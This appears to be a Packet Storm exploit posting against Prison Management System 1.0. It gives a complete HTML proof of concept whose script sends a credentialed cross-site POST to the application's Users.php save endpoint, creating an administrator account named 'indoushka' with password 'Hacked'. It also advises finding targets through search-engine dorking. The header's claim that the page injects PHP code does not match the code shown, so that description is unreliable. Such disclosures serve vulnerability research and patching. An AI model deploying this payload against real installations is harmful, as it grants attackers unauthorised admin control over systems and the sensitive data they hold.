Prison Management System 1.0 Add Administrator ≈ Packet Storm

Home^[1] Files^[2] News^[3] &[SERVICES_TAB] Contact^[4] Add New^[5]

Change Mirror^[11] Download^[12]

=============================================================================================================================================
| # Title     : Prison Management System v1.0 Add Admin Vulnerability                                                                       |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/PHP-pms.zip                                           |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This HTML page is designed to create a file and inject PHP code.
[+] save payload as poc.html 
[+] line 6,Set your target.
[+] payload : 
<!DOCTYPE html> 
<html> 
<body>
<script> function submitRequest() 
{ var xhr = new XMLHttpRequest(); 
xhr.open("POST", "http:\/\/127.0.0.1\/pms\/classes\/Users.php?f=save", true); 
xhr.setRequestHeader("Accept", "*\/*"); 
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");
xhr.withCredentials = true; 
var body =
"-----------------------------\r\n" + 
"Content-Disposition: form-data; name=\"username\"\r\n" + 
"\r\n" + 
"indoushka\r\n" + 
"-----------------------------\r\n" + 
"Content-Disposition: form-data; name=\"password\"\r\n" + 
"\r\n" + 
"Hacked\r\n" + 
"-----------------------------\r\n" + 
"Content-Disposition: form-data; name=\"type\"\r\n" + 
"\r\n" + 
"1\r\n" + 
"-------------------------------\r\n"; 
var aBody = new Uint8Array(body.length); 
for (var i = 0; i < aBody.length; i++) 
aBody[i] = body.charCodeAt(i); 
xhr.send(new Blob([aBody])); 
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form> 
</body> 
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

• Follow us on Twitter^[15]
• Follow us on Facebook^[16]
• Subscribe to an RSS Feed^[17]

File Tags

• ActiveX^[18] (933)
• Advisory^[19] (86,715)
• Arbitrary^[20] (17,039)
• BBS^[21] (2,859)
• Bypass^[22] (1,912)
• CGI^[23] (1,047)
• Code Execution^[24] (7,881)
• Conference^[25] (692)
• Cracker^[26] (844)
• CSRF^[27] (3,421)
• DoS^[28] (25,210)
• Encryption^[29] (2,394)
• Exploit^[30] (54,155)
• File Inclusion^[31] (4,272)
• File Upload^[32] (1,009)
• Firewall^[33] (822)
• Info Disclosure^[34] (2,912)
• Intrusion Detection^[35] (918)
• Java^[36] (3,155)
• JavaScript^[37] (908)
• Kernel^[38] (7,258)
• Local^[39] (14,836)
• Magazine^[40] (587)
• Overflow^[41] (13,208)
• Perl^[42] (1,435)
• PHP^[43] (5,254)
• Proof of Concept^[44] (2,402)
• Protocol^[45] (3,749)
• Python^[46] (1,655)
• Remote^[47] (31,839)
• Root^[48] (3,669)
• Rootkit^[49] (529)
• Ruby^[50] (640)
• Scanner^[51] (1,657)
• Security Tool^[52] (8,045)
• Shell^[53] (3,299)
• Shellcode^[54] (1,219)
• Sniffer^[55] (904)
• Spoof^[56] (2,292)
• SQL Injection^[57] (16,709)
• TCP^[58] (2,463)
• Trojan^[59] (690)
• UDP^[60] (919)
• Virus^[61] (672)
• Vulnerability^[62] (33,057)
• Web^[63] (10,132)
• Whitepaper^[64] (3,783)
• x86^[65] (969)
• XSS^[66] (18,282)
• Other^[67]

File Archives

• September 2024^[68]
• August 2024^[69]
• July 2024^[70]
• June 2024^[71]
• May 2024^[72]
• April 2024^[73]
• March 2024^[74]
• February 2024^[75]
• January 2024^[76]
• December 2023^[77]
• November 2023^[78]
• October 2023^[79]
• Older^[80]

Systems

• AIX^[81] (430)
• Apple^[82] (2,104)
• BSD^[83] (378)
• CentOS^[84] (61)
• Cisco^[85] (1,954)
• Debian^[86] (7,118)
• Fedora^[87] (1,693)
• FreeBSD^[88] (1,247)
• Gentoo^[89] (4,567)
• HPUX^[90] (881)
• iOS^[91] (387)
• iPhone^[92] (108)
• IRIX^[93] (220)
• Juniper^[94] (71)
• Linux^[95] (51,096)
• Mac OS X^[96] (696)
• Mandriva^[97] (3,105)
• NetBSD^[98] (256)
• OpenBSD^[99] (489)
• RedHat^[100] (16,754)
• Slackware^[101] (941)
• Solaris^[102] (1,615)
• SUSE^[103] (1,444)
• Ubuntu^[104] (9,812)
• UNIX^[105] (9,453)
• UnixWare^[106] (188)
• Windows^[107] (6,765)
• Other^[108]

© 2024 Packet Storm. All rights reserved.